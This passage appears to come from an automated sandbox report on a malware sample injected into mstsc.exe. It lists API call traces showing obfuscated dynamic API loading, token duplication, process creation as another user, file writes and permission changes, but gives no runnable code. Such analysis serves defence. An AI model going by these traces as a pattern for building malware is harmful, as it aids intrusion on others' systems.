    • GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00061542
    • HeapFree.KERNEL32(00000000), ref: 0006154B
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00061551
    • HeapFree.KERNEL32(00000000), ref: 00061554
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,00106D80), ref: 00064237
    • HeapAlloc.KERNEL32(00000000), ref: 0006423A
    • GetShellWindow.USER32 ref: 00064255
    • GetProcessHeap.KERNEL32(00000008,0000000F), ref: 000642AC
    • HeapAlloc.KERNEL32(00000000), ref: 000642AF
    • GetDoubleClickTime.USER32 ref: 000642CD
    • LoadLibraryA.KERNEL32(?), ref: 000642F7
    • GetProcAddress.KERNEL32(00000000), ref: 000642FE
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 00064376
    • HeapAlloc.KERNEL32(00000000), ref: 00064379
    • GetDialogBaseUnits.USER32 ref: 00064390
    • LoadLibraryA.KERNEL32(?), ref: 000643BA
    • GetProcAddress.KERNEL32(00000000), ref: 000643C1
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 00064419
    • HeapAlloc.KERNEL32(00000000), ref: 0006441C
    • CloseClipboard.USER32 ref: 00064433
    • LoadLibraryA.KERNEL32(?), ref: 0006445D
    • GetProcAddress.KERNEL32(00000000), ref: 00064464
    • GetProcessHeap.KERNEL32(00000008,00061A39), ref: 00064487
    • HeapAlloc.KERNEL32(00000000), ref: 0006448A
    • GetProcessHeap.KERNEL32(00000000,00000005), ref: 000644C8
    • HeapFree.KERNEL32(00000000), ref: 000644CB
    • CloseHandle.KERNEL32(?), ref: 000644D4
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000644DD
    • HeapFree.KERNEL32(00000000), ref: 000644E0
    • CloseHandle.KERNEL32(?), ref: 000644EC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000644F5
    • HeapFree.KERNEL32(00000000), ref: 000644F8
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064504
    • HeapFree.KERNEL32(00000000), ref: 0006450D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00064512
    • HeapFree.KERNEL32(00000000), ref: 00064515
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,?,?), ref: 00068F71
    • HeapAlloc.KERNEL32(00000000), ref: 00068F74
    • GetShellWindow.USER32 ref: 00068F8F
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00068FE5
    • HeapAlloc.KERNEL32(00000000), ref: 00068FE8
    • GetMessagePos.USER32 ref: 00069006
      • Part of subcall function 000685E0: VirtualAlloc.KERNEL32(00000000,000681EC,00003000,00000004,00000000,00000008,76E6FE8D), ref: 0006861B
      • Part of subcall function 000685E0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,000681EC,00000000), ref: 00068696
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00069052
    • HeapFree.KERNEL32(00000000), ref: 0006905B
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00069060
    • HeapFree.KERNEL32(00000000), ref: 00069063
    • GetProcessHeap.KERNEL32(00000008,00000018), ref: 000690A9
    • HeapAlloc.KERNEL32(00000000), ref: 000690AC
    • GetCaretBlinkTime.USER32 ref: 000690C3
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00069114
    • HeapFree.KERNEL32(00000000), ref: 0006911D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00069128
    • HeapFree.KERNEL32(00000000), ref: 0006912B
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00069130
    • HeapFree.KERNEL32(00000000), ref: 00069133
    • GetProcessHeap.KERNEL32(00000008,00000018), ref: 00069178
    • HeapAlloc.KERNEL32(00000000), ref: 0006917B
    • GetCapture.USER32 ref: 0006918F
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000691DB
    • HeapFree.KERNEL32(00000000), ref: 000691E4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 000691EB
    • HeapFree.KERNEL32(00000000), ref: 000691EE
    • GetProcessHeap.KERNEL32(00000000,?), ref: 000691F5
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00069200
    • HeapFree.KERNEL32(00000000), ref: 00069209
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00069210
    • HeapFree.KERNEL32(00000000), ref: 00069213
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006921A
    • HeapFree.KERNEL32(00000000), ref: 0006921D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00069222
    • HeapFree.KERNEL32(00000000), ref: 00069225
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • OpenProcess.KERNEL32(02000000,00000000), ref: 00066529
    • ProcessIdToSessionId.KERNEL32(?,?), ref: 00066541
    • OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 0006655F
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00064EA7
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00064EAA
      • Part of subcall function 00064E4E: GetLastError.KERNEL32 ref: 00064EC8
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001F), ref: 00064F61
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00064F64
      • Part of subcall function 00064E4E: GetTickCount.KERNEL32 ref: 00064F7E
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000017), ref: 00064FF4
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00064FF7
      • Part of subcall function 00064E4E: GetLogicalDrives.KERNEL32 ref: 00065011
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 00065099
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 0006509C
      • Part of subcall function 00064E4E: GetTickCount.KERNEL32 ref: 000650B6
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0006513F
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065142
      • Part of subcall function 00064E4E: GetMessageExtraInfo.USER32 ref: 0006515C
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001B), ref: 000651E4
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000651E7
      • Part of subcall function 00064E4E: GetCapture.USER32 ref: 00065201
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000010), ref: 0006526F
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065272
      • Part of subcall function 00064E4E: GetLogicalDrives.KERNEL32 ref: 0006528C
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000015), ref: 000652FE
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065301
      • Part of subcall function 00064E4E: GetMessagePos.USER32 ref: 0006531B
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 00065398
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 0006539B
      • Part of subcall function 00064E4E: GetTickCount.KERNEL32 ref: 000653B5
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0006542D
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065430
      • Part of subcall function 00064E4E: GetOpenClipboardWindow.USER32 ref: 0006544A
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 000654C5
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000654C8
      • Part of subcall function 00064E4E: DestroyCaret.USER32 ref: 000654E2
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000017), ref: 00065563
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065566
      • Part of subcall function 00064E4E: GetCursor.USER32 ref: 00065580
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000021), ref: 00065611
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065614
      • Part of subcall function 00064E4E: GetInputState.USER32 ref: 0006562E
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000021), ref: 000656B2
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000656B5
      • Part of subcall function 00064E4E: GetMessageExtraInfo.USER32 ref: 000656CC
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001B), ref: 00065758
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 0006575B
      • Part of subcall function 00064E4E: IsSystemResumeAutomatic.KERNEL32 ref: 00065775
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001C), ref: 000657F0
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000657F3
      • Part of subcall function 00064E4E: CountClipboardFormats.USER32 ref: 0006580D
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000013), ref: 00065879
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 0006587C
      • Part of subcall function 00064E4E: GetCurrentProcessId.KERNEL32 ref: 00065893
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000014), ref: 00065906
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065909
      • Part of subcall function 00064E4E: GetDesktopWindow.USER32 ref: 00065923
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000015), ref: 000659A5
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000659A8
      • Part of subcall function 00064E4E: GetMenuCheckMarkDimensions.USER32 ref: 000659C2
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000012), ref: 00065A39
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065A3C
      • Part of subcall function 00064E4E: GetLogicalDrives.KERNEL32 ref: 00065A56
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000012), ref: 00065AC5
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065AC8
      • Part of subcall function 00064E4E: GetLogicalDrives.KERNEL32 ref: 00065AE2
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001E), ref: 00065B66
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065B69
      • Part of subcall function 00064E4E: GetLogicalDrives.KERNEL32 ref: 00065B83
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00065BFC
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065BFF
      • Part of subcall function 00064E4E: GetFocus.USER32 ref: 00065C19
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001B), ref: 00065C93
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065C96
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32 ref: 00065CAE
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000013), ref: 00065D19
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065D1C
      • Part of subcall function 00064E4E: GetDoubleClickTime.USER32 ref: 00065D36
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000016), ref: 00065DA1
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065DA4
      • Part of subcall function 00064E4E: CountClipboardFormats.USER32 ref: 00065DBB
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 00065E30
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065E33
      • Part of subcall function 00064E4E: GetCaretBlinkTime.USER32 ref: 00065E4A
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00065EC0
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065EC3
      • Part of subcall function 00064E4E: DestroyCaret.USER32 ref: 00065EDA
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00065F50
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065F53
      • Part of subcall function 00064E4E: GetClipboardViewer.USER32 ref: 00065F6D
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00065FE4
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065FE7
      • Part of subcall function 00064E4E: CloseClipboard.USER32 ref: 00065FFE
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000021), ref: 00066083
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00066086
      • Part of subcall function 00064E4E: GetLastError.KERNEL32 ref: 0006609D
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000014), ref: 0006610F
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00066112
      • Part of subcall function 00064E4E: GetTickCount.KERNEL32 ref: 00066129
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001F), ref: 000661AB
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000661AE
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32 ref: 000661C6
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006622E
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00066231
      • Part of subcall function 00064E4E: GetClipboardSequenceNumber.USER32 ref: 00066248
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001F), ref: 000662D1
      • Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000662D4
      • Part of subcall function 00064E4E: GetCaretBlinkTime.USER32 ref: 000662E8
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00066320
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066329
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,dFim7), ref: 00066331
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066334
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,tE0QRzR1xx3vniVk1VKKSNboiOMO5bcEV1I6GBiwPomHXkXxyn0wDEGzdhQff8tsmxSygyxpZPGmv9ZHfdFim7), ref: 0006633E
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066341
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,47505A70), ref: 00066348
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006634B
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,79677953), ref: 00066352
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066355
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,6D737438), ref: 0006635C
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006635F
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,5370665A), ref: 00066369
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006636C
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,47454477), ref: 00066373
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066376
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,6E797858), ref: 0006637D
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066380
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,58486D6F), ref: 00066387
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006638A
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,77694247), ref: 00066394
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066397
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,667A726A), ref: 000663A1
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663A4
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,6A327676), ref: 000663AE
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663B1
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,7945594C), ref: 000663BB
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663BE
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,53335655), ref: 000663C8
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663CB
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,56696E76), ref: 000663D5
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663D8
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,78783152), ref: 000663E2
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663E5
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,4B4B5631), ref: 000663EF
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663F2
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,485A3976), ref: 000663F9
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663FC
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,47377263), ref: 00066406
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066409
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,356A7738), ref: 00066413
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066416
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,66516864), ref: 0006641D
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066420
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,31366B4A), ref: 0006642A
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006642D
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,49315645), ref: 00066437
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006643A
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,52554D49), ref: 00066444
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066447
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,37783247), ref: 00066451
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066454
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,73734533), ref: 0006645E
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066461
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,5A544772), ref: 0006646B
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006646E
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,344A4B51), ref: 00066478
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006647B
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,48376271), ref: 00066485
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066488
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,4A464336), ref: 00066492
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066495
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,62354F4D), ref: 0006649F
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000664A2
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,696F624E), ref: 000664AC
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000664AF
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,34367575), ref: 000664B9
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000664BC
      • Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,?), ref: 000664C6
      • Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000664C9
    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?), ref: 00066586
    • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,?), ref: 000665A6
    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00004000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 000665C0
    • GetLengthSid.ADVAPI32(?,?,?), ref: 000665D8
    • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008,?,?), ref: 000665EB
    • FreeSid.ADVAPI32(?,?,?), ref: 000665F0
    • SetTokenInformation.ADVAPI32(?,0000001B,00000000,00000004,?,?), ref: 00066604
    • CreateEnvironmentBlock.USERENV(?,?,00000001,?,?), ref: 0006660F
    • GetProcessHeap.KERNEL32(00000008,00000041,?,?), ref: 00066679
    • HeapAlloc.KERNEL32(00000000,?,?), ref: 00066680
    • GetCaretBlinkTime.USER32 ref: 0006669C
    • GetProcessHeap.KERNEL32(00000008,00000031,?,?), ref: 000666FF
    • HeapAlloc.KERNEL32(00000000,?,?), ref: 00066706
    • CreatePopupMenu.USER32 ref: 0006671A
    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?), ref: 00066777
    • OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 00066793
    • CloseHandle.KERNEL32(?), ref: 000667A8
    • CloseHandle.KERNEL32(00007479), ref: 000667B0
    • DestroyEnvironmentBlock.USERENV(00000000,?,?), ref: 000667BB
    • CloseHandle.KERNEL32(?), ref: 000667C4
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 000667C9
    • HeapFree.KERNEL32(00000000,?,?), ref: 000667D6
    • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 000667DB
    • HeapFree.KERNEL32(00000000,?,?), ref: 000667E2
    • CloseHandle.KERNEL32(?), ref: 000667ED
    • CloseHandle.KERNEL32(00000000), ref: 000667F0
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208,7142434B), ref: 000616C4
    • HeapAlloc.KERNEL32(00000000), ref: 000616C7
      • Part of subcall function 0006E684: GetModuleHandleA.KERNEL32(?,?), ref: 0006E6BD
      • Part of subcall function 0006E684: GetProcAddress.KERNEL32(00000000), ref: 0006E6C4
    • GetProcessHeap.KERNEL32(00000008,0000009D), ref: 000617AA
    • HeapAlloc.KERNEL32(00000000), ref: 000617AD
    • GetActiveWindow.USER32 ref: 000617C1
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 000617F0
    • GetProcessHeap.KERNEL32(00000008,00000039), ref: 00061836
    • HeapAlloc.KERNEL32(00000000), ref: 0006183D
    • GetCaretBlinkTime.USER32 ref: 00061854
    • StrStrIW.SHLWAPI(?,00000000), ref: 0006187E
    • GetProcessHeap.KERNEL32(00000008,00000051), ref: 000618ED
    • HeapAlloc.KERNEL32(00000000), ref: 000618F4
    • GetModuleHandleW.KERNEL32(00000000), ref: 0006190A
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 00061939
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061942
    • HeapFree.KERNEL32(00000000), ref: 00061949
    • StrCatW.SHLWAPI(?), ref: 0006195C
      • Part of subcall function 0006DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0006DD37
      • Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD44
      • Part of subcall function 0006DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0006DD6B
      • Part of subcall function 0006DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00061970,?), ref: 0006DD76
      • Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD80
      • Part of subcall function 0006DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00061970,?), ref: 0006DD95
      • Part of subcall function 0006DD0B: CloseHandle.KERNEL32(00000000), ref: 0006DD9C
      • Part of subcall function 0006DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00061970,?), ref: 0006DDA9
      • Part of subcall function 0006DD0B: HeapFree.KERNEL32(00000000), ref: 0006DDB0
    • HeapFree.KERNEL32(00000000), ref: 000619BB
      • Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000008,00000015,00000000,?,?), ref: 00068799
      • Part of subcall function 00068761: HeapAlloc.KERNEL32(00000000), ref: 0006879C
      • Part of subcall function 00068761: GetTickCount.KERNEL32 ref: 000687B8
      • Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00068804
      • Part of subcall function 00068761: HeapAlloc.KERNEL32(00000000), ref: 00068807
      • Part of subcall function 00068761: GetCapture.USER32 ref: 00068819
      • Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0006886A
      • Part of subcall function 00068761: HeapAlloc.KERNEL32(00000000), ref: 00068871
      • Part of subcall function 00068761: GetCursor.USER32 ref: 00068885
      • Part of subcall function 00068761: LoadLibraryA.KERNEL32(66713859), ref: 000688B6
      • Part of subcall function 00068761: GetProcAddress.KERNEL32(00000000), ref: 000688BD
      • Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000688DF
      • Part of subcall function 00068761: HeapFree.KERNEL32(00000000), ref: 000688EC
      • Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000000,66713859), ref: 000688F7
      • Part of subcall function 00068761: HeapFree.KERNEL32(00000000), ref: 000688FA
      • Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000000,?), ref: 00068901
      • Part of subcall function 00068761: HeapFree.KERNEL32(00000000), ref: 00068904
      • Part of subcall function 0006D8BA: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0006D8EA
      • Part of subcall function 0006D8BA: SetEntriesInAclW.ADVAPI32(00000001,000000FF,00000000,?), ref: 0006D920
      • Part of subcall function 0006D8BA: LocalAlloc.KERNEL32(00000040,00000014), ref: 0006D92A
      • Part of subcall function 0006D8BA: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0006D934
      • Part of subcall function 0006D8BA: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 0006D941
      • Part of subcall function 0006D8BA: SetFileSecurityW.ADVAPI32(?,00000004,00000000), ref: 0006D94B
      • Part of subcall function 0006D8BA: FreeSid.ADVAPI32(00000000), ref: 0006D95A
      • Part of subcall function 0006D8BA: LocalFree.KERNEL32(00000000), ref: 0006D96F
      • Part of subcall function 0006D8BA: LocalFree.KERNEL32(00000000), ref: 0006D976
      • Part of subcall function 00061560: StrDupW.SHLWAPI(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00061992), ref: 0006158B
      • Part of subcall function 00061560: GetProcessHeap.KERNEL32(00000008,00000015), ref: 000615D6
      • Part of subcall function 00061560: HeapAlloc.KERNEL32(00000000), ref: 000615D9
      • Part of subcall function 00061560: GetClipboardViewer.USER32 ref: 000615E8
      • Part of subcall function 00061560: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061639
      • Part of subcall function 00061560: HeapFree.KERNEL32(00000000), ref: 0006163C
      • Part of subcall function 00061560: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00061992), ref: 0006166C
      • Part of subcall function 00061560: HeapFree.KERNEL32(00000000), ref: 0006166F
      • Part of subcall function 00061560: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00061992), ref: 0006167A
      • Part of subcall function 00061560: HeapFree.KERNEL32(00000000), ref: 0006167D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006199E
    • HeapFree.KERNEL32(00000000), ref: 000619A1
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000619AA
    • HeapFree.KERNEL32(00000000), ref: 000619B3
    • GetProcessHeap.KERNEL32(00000000,?), ref: 000619B8
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
